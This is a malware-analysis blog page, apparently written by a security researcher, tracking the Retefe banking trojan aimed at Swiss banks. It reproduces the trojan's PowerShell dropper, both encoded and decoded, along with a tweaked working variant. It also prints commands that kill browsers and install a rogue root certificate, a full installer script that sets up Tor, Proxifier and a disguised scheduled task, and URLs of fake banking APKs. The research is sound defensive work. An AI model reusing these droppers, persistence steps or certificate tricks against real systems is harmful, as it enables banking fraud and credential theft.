Showing posts with label emmental. Show all posts
Showing posts with label emmental. Show all posts

Friday, February 24, 2017

Hunting Retefe with Splunk - some interesting points

While I was creating some Splunk use cases to detect malware (together with Sysmon) I was doing some test with malware Refete which I wrote quite a bit in this blog about it. 
There are a couple of things I found interested to share

 The initial vector of infection is through Malspam with a fake bill in a DOCX file which contains some malicious code. However, this time the malicious code is PowerShell, instead of JS (more info in http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html)
This can be spotted straight forward in Splunk.

 



powershell -EncodedCommand "JABGAD0AJABlAG4AdgA6AFQAZQBtAHAAKwAnAFwAUgBCAFgAcgAxAGwAawA5AFAALgBqAHMAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAGwAZQA2AGkAZABmAGQAcQB3AGQAcgA2AG0AMgB3AC4AbwBuAGkAbwBuAC4AdABvAC8AUgBCAFgAcgAxAGwAawA5AFAALgBqAHMAPwBpAHAAPQAnACsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQBwAGkALgBpAHAAaQBmAHkALgBvAHIAZwAvACcAKQArACcAJgBpAGQAPQAnACsAKAAoAHcAbQBpAGMAIABwAGEAdABoACAAdwBpAG4AMwAyAF8AbABvAGcAaQBjAGEAbABkAGkAcwBrACAAZwBlAHQAIAB2AG8AbAB1AG0AZQBzAGUAcgBpAGEAbABuAHUAbQBiAGUAcgApAFsAMgBdACkALgB0AHIAaQBtACgAKQAuAHQAbwBMAG8AdwBlAHIAKAApACwAJABGACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQARgApADsA"

The command decoded, which acts as a dropper, is the following:

 
1
2
$F=$env:Temp+'\RBXr1lk9P.js';
(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='+(New-Object System.Net.WebClient).DownloadString('http://api.ipify.org/')+'&id='+((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F);

Basically, it requests a file located in a Tor node (which is the payload) through the onion.to website: https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=

 To request the file, it is necessary to send the IP of the victim as parameter and the logical number of the disk. To do so, there are 2 things happening:

 1) request to http://api.ipify.org/ in order to get the public IP of the victim
2) run the command ((wmic path win32_logicaldisk get volumeserialnumber)[2]) to extract the serial number of the logical disk.
If the IP is not from some specific countries or the serial number is empty the payload downloaded is empty as well, hence nothing happens. Actually, in some cases the parameter "2", doesn't work, and needs to be different.  For, example this command will work in some VirtualMachines (just need to put an IP from Switzerland in the w.x.y.z)
$F=$env:Temp+'\RBXr1lk9P.js';(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=w.x.y.z&id='+((wmic path win32_logicaldisk get volumeserialnumber)[4]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F)

Clearly, they are using the logical number for tracking purposes

 Once the script is pulled the whole execution happens. Some JS code is executed, some additional tools are decompressed and execute (Tor and Proxifier), the browser processes are killed, etc.



However, a couple of new 'features' have been introduced since my last posts:
http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html
http://blog.angelalonso.es/2016/10/malicious-email-campaign-mimicking.html

 First of all is the way that the Proxifier tool is launched, as the window now is hidden. This is done with the PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$t='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;saps -FilePath \"Proxifier\";while(![n.w]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName(\"proxifier\")|gps).MainWindowHandle,0)){}"

 Second, the Proxifier is configured to not be shown in the windows system Icon on the bottom left part of the desktop.



After that, the victim's traffic towards the banks is redirect to Tor. In order to steal the TAN SMS token, it is necessary to install a malicious APK, however here there are some changes as well:




Now the APK resides in a domain with a valid SSL certificate and the APK can be dowloaded by HTTPS. Before, this was not the case and the traffic was only HTTP

 Note that the certificate has been registered a few days ago and the expiration date is 2 months




Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger" tool, hence the victim's phone doesn't get infected. Some examples of the URL for different banks:

 https://mobile-sicherheitapp.com/ZKB-Security-v19-02.apk
https://mobile-sicherheitapp.com/CreditSuisse-Security_v1902.apk

https://mobile-sicherheitapp.com/Raiffeisenc-Security-v_19-02.apk



Publicado por
Etiquetas: , , ,

Wednesday, November 16, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (III)

Following last two posts, this is a quick update as I have detected that some new Swiss banks have been added to the list of victims of Retefe (since last time I checked some weeks ago)

 These are:

  *valiant.ch;*
 *wir.ch;
 *bankthalwil.ch;
 *piguetgalland.ch;
 *triba.ch;
 *inlinea.ch;
 *bernerlandbank.ch;
 *bancasempione.ch;
 *bsibank.com;
 *corneronline.ch;
 *vermoegenszentrum.ch;
 *gobanking.ch;
 *slbucheggberg.ch;
 *slfrutigen.ch;
 *hypobank.ch;
 *regiobank.ch;
 *rbm.ch;
 *hbl.ch;
 *ersparniskasse.ch;
 *ekr.ch;*
 sparkasse-dielsdorf.ch;
 *eki.ch;
 *bankgantrisch.ch;
 *bbobank.ch;
 *alpharheintalbank.ch;
 *aekbank.ch;*
 *acrevis.ch


Also, the Cyber Criminals have changed the way the malicious payload is weaponized through a malicious 'docx'.. Instead os using a JS script, now they are using an executable EXE:



Publicado por
Etiquetas: , ,

Monday, October 17, 2016

Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (II)

A few days ago when I took a look to the latest Retefe campaign affecting Swiss financial Institutions, I did not have the time to take a deeper look to the malicious JS embedded in the .docx file.  So in this post I'll explain a bit about it. Particularly, I'm interested in understanding how the Proxifier tool is setup with a custom profile to forward the traffic through Tor. This tool is something Cyber Criminals have introduced recently, as previously they used a proxy PAC file which is setup in the registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL"

Last analysis about Retefe from Avast shows exactly the behaviour described above.

Retefe is not just affecting Swiss banks, but also other countries banks, like UK. So it might be that the custom proxy file is hardcoded into the malicious JS or dynamically this file is downloaded. So let's take a look to it.

(I have upload the malicious JS payload to VT )

The JS is obfuscated so I'm using Visual Studio to perform some debugging.

The first interesting thing I see are the Tor URLs defined bvq64y3wwg3zzguk.onion, v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion,




Also,  there is the fake Comodo CA which it used to avoid the browser SSL warnings. This is base64 encoded.




There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.








Then there is a command to import the certificate
"certutil -addstore -f -user \"ROOT\" \""

 and some base64 encoded commands to kill the browser running:


"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="
taskkill /F /im iexplore.exe

 "dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"
taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe

 So at this point the malicious certificate has been imported and all the browsers, after killking them, have the COMODO CA maliciuos certificate in their CA chain

 Debugging deeper, in the end, a temporal file is created which contains a PowerShell script the interesting stuff


This is the code

 

function Unzip
{
param([string]$zipfile, [string]$destination);
$7zaExe = Join-Path $env:Temp '7za.exe';
if (-NOT (Test-Path $7zaExe)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe);
}
Catch{}
}
if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){
Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function AddTask
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0);
$ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
$td=$ts.NewTask();
$td.RegistrationInfo.Description = 'Does something';
$td.Settings.DisallowStartIfOnBatteries = $False;
$td.Settings.StopIfGoingOnBatteries = $False;
$td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
$LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
$LogonTrigger.StartBoundary=[System.DateTime]::Now;
$LogonTrigger.UserId=$env:username;
$LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
$td.Triggers.Add($LogonTrigger);
if($restart -eq 1){
$TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
$TimeTrigger.StartBoundary=[System.DateTime]::Now;
$TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(20);
$TimeTrigger.Repetition.StopAtDurationEnd=$False;
$td.Triggers.Add($TimeTrigger);
}
$ExecAction=New-Object Microsoft.Win32.TaskScheduler.ExecAction($cmd,$params);
$td.Actions.Add($ExecAction);
$task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
$task.Run();
}
function InstallTP{
$File=$env:Temp+'\ts.zip';
$Dest=$env:Temp+'\ts';
(New-Object System.Net.WebClient).DownloadFile('http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031',$File);
if ((Test-Path $Dest) -eq 1){rm -Force -Recurse $Dest;}md $Dest | Out-Null;
Unzip $File $Dest;
rm -Force $File;
$TSAssembly=$Dest+'\v2.0\Microsoft.Win32.TaskScheduler.dll';
$loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
$TFile=$env:Temp+'\t.zip';
$DestTP=$env:APPDATA+'\TP';
(New-Object System.Net.WebClient).DownloadFile('https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip',$TFile);
if ((Test-Path $DestTP) -eq 1){rm -Force -Recurse $DestTP;}md $DestTP | Out-Null;
Unzip $TFile $DestTP;
rm -Force $TFile;
$tor=$DestTP+'\Tor\tor.exe';
$tor=$tor.Replace('\','/');
$tor_cmd="`"javascript:close(new ActiveXObject('WScript.Shell').Run('$tor',0,false))`"";
AddTask 'SkypeUpdateTask' 'mshta.exe' $tor_cmd;
$PFile=$env:Temp+'\p1.zip';
$wc=new-object net.webclient;
$purl='http://proxifier.com/distr/ProxifierPE.zip';
$wc.DownloadFile($purl,$PFile);
Unzip $PFile $DestTP;
$p_old=$DestTP+'\Proxifier PE\';
rm -Force $PFile;
Rename-Item -path $p_old -newName 'p';
$p_fold=$DestTP+'\p\';
$p=$DestTP+'\p\Proxifier.exe';
$settings_file=$p_fold+'Settings.ini';
Base64ToFile $settings_file 'W1NldHRpbmdzXQ0KRGVmYXVsdE5ldFByb2ZpbGU9MTcxMTg3Njg4NQ0KTG9nTGV2ZWxTY3JlZW49Mg0KTG9nTGV2ZWxGaWxlPTANCkxvZ1BhdGg9DQpTeXNUcmF5SWNvbj0xDQpTeXNUcmF5SWNvblNob3dUcmFmZmljPTANClNob3dUcmFmZmljVHlwZT0wDQpUcmFmZmljUmVmcmVzaFNwZWVkPTENCkFjdGl2ZVByb2ZpbGU9RGVmYXVsdA0KUHJvZmlsZUF1dG9VcGRhdGU9MA0KUHJvZmlsZVVwZGF0ZVVybD0NClByb2ZpbGVVcGRhdGVVcmxUb0ZvbGRlcj0xDQpQcm9maWxlVXBkYXRlS2VlcExvZ2lucz0wDQpVcGRhdGVDaGVjaz0wDQpbV29ya3NwYWNlXQ0KQXBwbGljYXRpb25Mb29rPTIxNA0KUnVsZURsZ1dpZHRoPTczMg0KUnVsZURsZ0hlaWdodD00MzYNCltEZWZhdWx0XENvbnRyb2xCYXJWZXJzaW9uXQ0KTWFqb3I9OQ0KTWlub3I9MA0KW0RlZmF1bHRcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1BQUFBQUFBQUFBQUENCltEZWZhdWx0XENvbW1hbmRNYW5hZ2VyXQ0KQ29tbWFuZHNXaXRob3V0SW1hZ2VzPUFBQUENCk1lbnVVc2VySW1hZ2VzPUFBQUENCltEZWZhdWx0XENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW0RlZmF1bHRcUGFuZS01OTM5M10NCklEPTANClJlY3RSZWNlbnRGbG9hdD1LQUFBQUFBQUtBQUFBQUFBT0dBQUFBQUFPR0FBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1BQUFBQUFBQUdKQkFBQUFBRUVEQUFBQUFKS0JBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9NDA5Ng0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW0RlZmF1bHRcQmFzZVBhbmUtNTkzOTNdDQpJc1Zpc2libGU9MQ0KW0RlZmF1bHRcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBQ0FCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLS0xXQ0KSXNWaXNpYmxlPTENCltEZWZhdWx0XFBhbmUtMzEwXQ0KSUQ9MzEwDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTgxOTINClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbRGVmYXVsdFxQYW5lLTEwMjJdDQpJRD0xMDIyDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFJS0JBQUFBQUFNQkFBQUFBQUhDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9RUFBQUFBQUFHRUFBQUFBQUFFREFBQUFBSU9BQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltEZWZhdWx0XEJhc2VQYW5lLTEwMjJdDQpJc1Zpc2libGU9MA0KW0RlZmF1bHRcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUlQQUFBQUFBSUtCQUFBQUFBTUJBQUFBQUFIQ0FBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQUlPQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbRGVmYXVsdFxCYXNlUGFuZS0xMDIzXQ0KSXNWaXNpYmxlPTANCltEZWZhdWx0XERvY2tpbmdNYW5hZ2VyLTEyOF0NCkRvY2tpbmdQYW5lQW5kUGFuZURpdmlkZXJzPUFBQUFBQUFBQ0FBQUFBQUFBQUFBQUFBQUFBQUNBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQQUFBQUFBQUFDQUJBQUFBQUVFREFBQUFBR0FCQUFBQUFBQUFBQUFBQUJBQUFBQUFCRUFBQUFBQUFCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFQUFBQUFBQUERBQUFBQUFBR0RCQUFBQUFPUERBQUFBQVBQREFBQUFBUFBQUENBQUFMQUFBREVFRkJHQ0dDR0ZHRUdBRkJHT0dGR0FBQUNBQUFBQkFBQUFBQUFJUEFBQUFBQUlLQkFBQUFBQU1CQUFBQUFBSENBQUFBQUFBQUFBQUFBT0NBQUFBQUFFRURBQUFBQUNBQkFBQUFBQUFBQUFBQUFBRUVCQUFHRkRBQUFBQUFBUFBPUFBQTEFERUFBUEdBQU9HQUFPR0FBRkdBQURHQUFFSEFBSkdBQVBHQUFPR0FBREhBQUJBQUFBQUFBR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBQUE9QUFBIQUVGQUFDSEFBQkdBQUdHQUFHR0FBSkdBQURHQUFCQUFBQUFBQU9QREFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQS0FERkFBRUhBQUJHQUFFSEFBSkdBQURIQUFFSEFBSkdBQURHQUFESEFBQkFBQUFBQUFQUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUJBQUFBQUFBUFBQUFBQUFBHREJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ0KW1N0YXR1c10NCkZpcnN0UnVuPTANClN5c1RyeUljb25NZXNzYWdlU2hvd249MQ0KW1dvcmtzcGFjZVxDb250cm9sQmFyVmVyc2lvbl0NCk1ham9yPTkNCk1pbm9yPTANCltXb3Jrc3BhY2VcTUZDVG9vbEJhclBhcmFtZXRlcnNdDQpUb29sdGlwcz0xDQpTaG9ydGN1dEtleXM9MQ0KTGFyZ2VJY29ucz0wDQpNZW51QW5pbWF0aW9uPTANClJlY2VudGx5VXNlZE1lbnVzPTENCk1lbnVTaGFkb3dzPTENClNob3dBbGxNZW51c0FmdGVyRGVsYXk9MQ0KQ29tbWFuZHNVc2FnZT1HRkFBQUFBQUVCQUFBRUJPQUFBQUJBQUFBQUFBTkFFQUFBQUFDQUFBQUFBQVBIQUlBQUFBQkFBQUFBQUFFQUJPQUFBQUJBQUFBQUFBT0JBSUFBQUFHQkFBQUFBQU9FQUlBQUFBREFBQUFBQUFQRkFJQUFBQUNBQUFBQUFBTEVBSUFBQUFCQUFBQUFBQU1BRUFBQUFBQkFBQUFBQUFPSEFJQUFBQUJBQUFBQUFBREFCT0FBQUFDQUFBQUFBQU5CQUlBQUFBQUJBQUFBQUFQREFJQUFBQUxBQUFBQUFBQUFFQUFBQUFDQUFBQUFBQUNDQk9BQUFBQ0FBQUFBQUFESUFJQUFBQURBQUFBQUFBTURBSUFBQUFFQUFBQUFBQUtFQUlBQUFBSUFBQUFBQUFNQkFJQUFBQUNBQUFBQUFBT0RBSUFBQUFCQUFBQUFBQQ0KW1dvcmtzcGFjZVxDb21tYW5kTWFuYWdlcl0NCkNvbW1hbmRzV2l0aG91dEltYWdlcz1BQUFBDQpNZW51VXNlckltYWdlcz1BQUFBDQpbV29ya3NwYWNlXENvbnRyb2xCYXJzLVN1bW1hcnldDQpCYXJzPTANClNjcmVlbkNYPTE2ODANClNjcmVlbkNZPTk0NQ0KW1dvcmtzcGFjZVxQYW5lLTU5MzkzXQ0KSUQ9MA0KUmVjdFJlY2VudEZsb2F0PUtBQUFBQUFBS0FBQUFBQUFPR0FBQUFBQU9HQUFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUFBQUFBQUFBR0pCQUFBQUFFRURBQUFBQUpLQkFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD00MDk2DQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTU5MzkzXQ0KSXNWaXNpYmxlPTENCltXb3Jrc3BhY2VcUGFuZS0tMV0NCklEPS0xDQpSZWN0UmVjZW50RmxvYXQ9SVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUENClJlY3RSZWNlbnREb2NrZWQ9QUFBQUFBQUFPQ0FBQUFBQUVFREFBQUFBSEJCQUFBQUENClJlY2VudEZyYW1lQWxpZ25tZW50PTQwOTYNClJlY2VudFJvd0luZGV4PTANCklzRmxvYXRpbmc9MA0KTVJVV2lkdGg9MzI3NjcNClBpblN0YXRlPTANCltXb3Jrc3BhY2VcQmFzZVBhbmUtLTFdDQpJc1Zpc2libGU9MQ0KW1dvcmtzcGFjZVxQYW5lLTMxMF0NCklEPTMxMA0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTMxMF0NCklzVmlzaWJsZT0wDQpbV29ya3NwYWNlXFBhbmUtMTAyMl0NCklEPTEwMjINClJlY3RSZWNlbnRGbG9hdD1DQUJBQUFBQUlCQkFBQUFBS01CQUFBQUFBT0JBQUFBQQ0KUmVjdFJlY2VudERvY2tlZD1FQUFBQUFBQUdFQUFBQUFBQUVEQUFBQUFOUEFBQUFBQQ0KUmVjZW50RnJhbWVBbGlnbm1lbnQ9ODE5Mg0KUmVjZW50Um93SW5kZXg9MA0KSXNGbG9hdGluZz0wDQpNUlVXaWR0aD0zMjc2Nw0KUGluU3RhdGU9MA0KW1dvcmtzcGFjZVxCYXNlUGFuZS0xMDIyXQ0KSXNWaXNpYmxlPTANCltXb3Jrc3BhY2VcUGFuZS0xMDIzXQ0KSUQ9MTAyMw0KUmVjdFJlY2VudEZsb2F0PUNBQkFBQUFBSUJCQUFBQUFLTUJBQUFBQUFPQkFBQUFBDQpSZWN0UmVjZW50RG9ja2VkPUVBQUFBQUFBR0VBQUFBQUFBRURBQUFBQU5QQUFBQUFBDQpSZWNlbnRGcmFtZUFsaWdubWVudD04MTkyDQpSZWNlbnRSb3dJbmRleD0wDQpJc0Zsb2F0aW5nPTANCk1SVVdpZHRoPTMyNzY3DQpQaW5TdGF0ZT0wDQpbV29ya3NwYWNlXEJhc2VQYW5lLTEwMjNdDQpJc1Zpc2libGU9MA0KW1dvcmtzcGFjZVxEb2NraW5nTWFuYWdlci0xMjhdDQpEb2NraW5nUGFuZUFuZFBhbmVEaXZpZGVycz1BQUFBQUFBQUNBQUFBQUFBQUFBQUFBQUFBQUFDQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUEFBQUFBQUFBSEJCQUFBQUFFRURBQUFBQUxCQkFBQUFBQUFBQUFBQUFCQUFBQUFBQkVBQUFBQUFBQkFBQUFBQUFHSk9QUFBQUElGQUFBQUFBUFBQUFBQUFBEQUFBQUFBQUdEQkFBQUFBT1BEQUFBQUFQUERBQUFBQVBQUFBDQUFBTEFBQURFRUZCR0NHQ0dGR0VHQUZCR09HRkdBQUFDQUFBQUJBQUFBQUFBSVBBQUFBQUFHTkJBQUFBQU1ERUFBQUFBUExDQUFBQUFBQUFBQUFBQU9DQUFBQUFBRUVEQUFBQUFIQkJBQUFBQUFBQUFBQUFBQUVFQkFBR0ZEQUFBQUFBQVBQT1BQUExBREVBQVBHQUFPR0FBT0dBQUZHQUFER0FBRUhBQUpHQUFQR0FBT0dBQURIQUFCQUFBQUFBQUdEQkFBQUFBQkFBQUFBQUFQUFBQUFBQUFBQUFBQUFBQUFBPUFBQSEFFRkFBQ0hBQUJHQUFHR0FBR0dBQUpHQUFER0FBQkFBQUFBQUFPUERBQUFBQUJBQUFBQUFBUFBQUFBQUFBQUFBQUFBQUFBQT1BQUEtBREZBQUVIQUFCR0FBRUhBQUpHQUFESEFBRUhBQUpHQUFER0FBREhBQUJBQUFBQUFBUFBEQUFBQUFCQUFBQUFBQVBQUFBQUFBQUFBQUFBQUFBBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFCQUFBQUFBQVBQUFBQUFBQR0RCQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUENCltXb3Jrc3BhY2VcV2luZG93UGxhY2VtZW50XQ0KTWFpbldpbmRvd1JlY3Q9QVBBQUFBQUFLSUJBQUFBQUVFRUFBQUFBSkZEQUFBQUENCkZsYWdzPTANClNob3dDbWQ9MQ0KW0xpY2Vuc2VdDQpPd25lcj0yVENLWC1UWVFITC1ORk4zMy0zWUVEWS1RVzY1RA0KS2V5PTJUQ0tYLVRZUUhMLU5GTjMzLTNZRURZLVFXNjVEDQo=';
$p_prof=$p_fold+'Profiles\';
md $p_prof | Out-Null;
$def_file=$p_prof+'Default.ppx';
Base64ToFile $def_file 'PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgID